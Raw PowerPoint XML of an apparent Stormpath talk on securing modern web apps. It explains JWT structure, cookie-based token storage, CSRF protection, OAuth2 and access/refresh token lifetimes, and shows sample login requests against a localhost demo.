            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>pc19yb290Ijp0cnVlfQ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dBjftJeZ4CVPmB92K27uhbUJU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1p1r_wW1gFWFOEjXk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3429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43400" y="4495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5562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3200400"/>
            <a:ext cx="109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4294221"/>
            <a:ext cx="20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Body (‘Claims’)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9082" y="5350395"/>
            <a:ext cx="320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Cryptographic Signature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8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Base64-decode the parts to see the contents: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3276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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>typ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>":"JWT",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>alg":"HS256"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10986"/>
            <a:ext cx="3276600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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”:”http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trustyapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/”,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exp"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: 1300819380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/>
              <a:t>sub”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: ”users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>8983462”,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/>
              <a:t>scope”: “self </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/buy”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327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tß</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>´—™</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>à%O˜v+nî</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SZu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>¯µ€U…8H×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0"/>
            <a:ext cx="125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4038600"/>
            <a:ext cx="234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Body (‘Claims’)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5235642"/>
            <a:ext cx="371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Cryptographic Signature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34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asserts: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57400"/>
            <a:ext cx="48768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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>iss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>": "http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/",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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"sub": "users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>8983462",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"scope": "self </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>buy"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8165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1965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1565" y="3388507"/>
            <a:ext cx="214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it expires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1965" y="3662142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1565" y="4114800"/>
            <a:ext cx="243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it represents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11965" y="4388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1565" y="4876800"/>
            <a:ext cx="239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they can do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11965" y="5150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Issuing JWTs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 has to present credentials to get a token (password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> keys).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Tokens are issued by your server, and signed with a secret key that is private.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client stores the tokens, and uses them to authenticate requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124001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Verifying JWTs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Just check the signature and expiration time! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Stateless authentication!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Token declares scope, make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> decisions locally.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But.. How to revoke stateless authentication?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Storing JWTs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Local Storage is not secure (XSS vulnerable)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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cookies to store access tokens in the browser.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Cookies provide an automatic way of supplying the tokens on requests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CSRF protection is essential!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317247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JWT + OAuth2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298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JWT + OAuth2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OAuth2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RFC 6749</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) is an “Authorization Framework” (and a good sleep aid).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defines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>“Resource Owner Password Credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Grant”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other words: exchange username and password for an access token and refresh token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88829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u="sng" spc="120" dirty="0" smtClean="0"/>
              <a:t>Talk Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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30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Security Concerns for Modern Web Apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="50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Cookies, The Right Way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Session ID Problems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Token Authentication to the rescue!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Angular Examples</a:t>
            </a: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27084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JWT + OAuth2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b="1" dirty="0" smtClean="0"/>
              <a:t>access token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has a short lifetime, and can use stateless trust – a signed JWT!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b="1" dirty="0" smtClean="0"/>
              <a:t>refresh token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has a long lifetime and is used to obtain more access tokens.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access tokens should can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>revoked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>database)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2613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848600" cy="4983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 Access Token and Refresh Token paradigm is designed to give you control over the implicit-trust tradeoff that is made with stateless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6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Access &amp; Refresh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848600" cy="49831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Refresh token sets the maximum lifetime of the authenticated context.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Authentication token sets the maximum time of the stateless authentication context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Authentication context is revoked by revoking the refresh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0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Examples	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83163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Uber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-secure banking application (want to force user out often):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Access token TTL = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>minutes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Refresh token TTL = 30 minutes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350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Mobile/social app (user should “always be logged in”)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Access token TTL = 1 hour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Refresh token TTL = 4 years (lifetime of mobile device)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256805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Demonstrate!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err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>stormpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/express-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>stormpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>-angular-sample-project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417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App w/ Login Form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-05-12 at 11.1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696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0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makes POST to /login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POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/login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Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost:9000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username=robert%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>40stormpath.com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&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=robert%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>40stormpath.com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45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Server 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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>200 OK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set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>access_token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eyJ0eXAiOiJKV1QiLCJhbGciOiJ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IUzI1NiJ9.ZJD3YlPMq38IcxN335Umeflnte1nFPDEvoSl26rSXkg…; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Expires=Wed, 13 May 2015 07:15:33 GMT; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=/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set-cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>refresh_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=eyJ0iI2NldURFJVJkNZhbGciO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iJIUzI1NiJ9.9ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…; Expires=Wed, 13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Jun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>2015 07:15:33 GMT; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HttpOnly;Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=/;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790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Subsequent Requests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GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://localhost:9000/api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/profile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Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>access_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>eyJpc3MiOi92MS9…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Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>refresh_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=eyJ0iI2NldURFJVJkNZhbGciO1NiJ9.9ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy8…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19696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Server Request Handler – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> 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access token valid (signature &amp; expiration)?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Yes? Allow the request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No? Try to get a new access token, using the refresh token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Did that work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Yes? Allow the request, send new access token on response as cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>No? Reject the request, delete refresh token cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336091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u="sng" spc="120" dirty="0" smtClean="0"/>
              <a:t>Structure of Modern Web Apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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307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spc="50" dirty="0" smtClean="0"/>
              <a:t>Back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>-end: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1"/>
              <a:t>RESTful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0"/>
              <a:t> JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>API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2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>is usually an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>HTML5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>Environment:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="2400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0" smtClean="0"/>
              <a:t>Single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0"/>
              <a:t>Page Apps (“SPAs”), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0" err="1"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0" err="1"/>
              <a:t>AngularJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0"/>
              <a:t>, React</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>WebKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>“Hybrid” Mobile apps (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>Phonegap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350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endParaRPr lang="en-US" sz="2400" spc="50" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350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endParaRPr lang="en-US" sz="2400" spc="50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98514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Recap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1597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Cookies need to be secured!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JWTs are an improvement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on the opaque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>session identifier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access Token + Refresh Token is as useful strategy for scaling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OAuth2 will put you to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066800" y="11430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Thanks!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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590800"/>
            <a:ext cx="4762799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Use Stormpath for API Authentication &amp; Security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Our API and libraries give you a cloud-based user database and web application security in no time!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Get started with your free Stormpath developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>account: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https://api.stormpath.com/register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support@stormpath.com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16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Security Concerns for Modern Web Apps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As a developer, you need to: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Secure user credentials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Secure server endpoints (API)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/>
              <a:t>Prevent malicious code from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>executing in client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Provide Access Control information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The Traditional Solution,</a:t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Session Identifiers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6911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accept username &amp; password, then store a Session ID in a cookie and associate that session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99808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tasof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katasoft_new</Template>
  <TotalTime>54387</TotalTime>
  <Words>1936</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>322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katasoft_new</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>About Me</vt:lpstr>
      <vt:lpstr>About Stormpath</vt:lpstr>
      <vt:lpstr>Talk Overview</vt:lpstr>
      <vt:lpstr>Structure of Modern Web Apps</vt:lpstr>
      <vt:lpstr>Security Concerns for Modern Web Apps</vt:lpstr>
      <vt:lpstr>The Traditional Solution,  Session Identifiers</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Securing User Credentials: Session ID Cookie</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Session ID Problems</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookies, The Right Way ®</vt:lpstr>
      <vt:lpstr>Man In The Middle (MITM) Attack</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS Attacks</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS Attack – What Can I Do?</vt:lpstr>
      <vt:lpstr>XSS Attack – What Can I Do?</vt:lpstr>
      <vt:lpstr>XSS Attack – What Can I Do?</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery  (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Double Submit Cookie</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CORS Warning!</vt:lpstr>
      <vt:lpstr>Origin Header check</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Token Auth – All you need to know</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
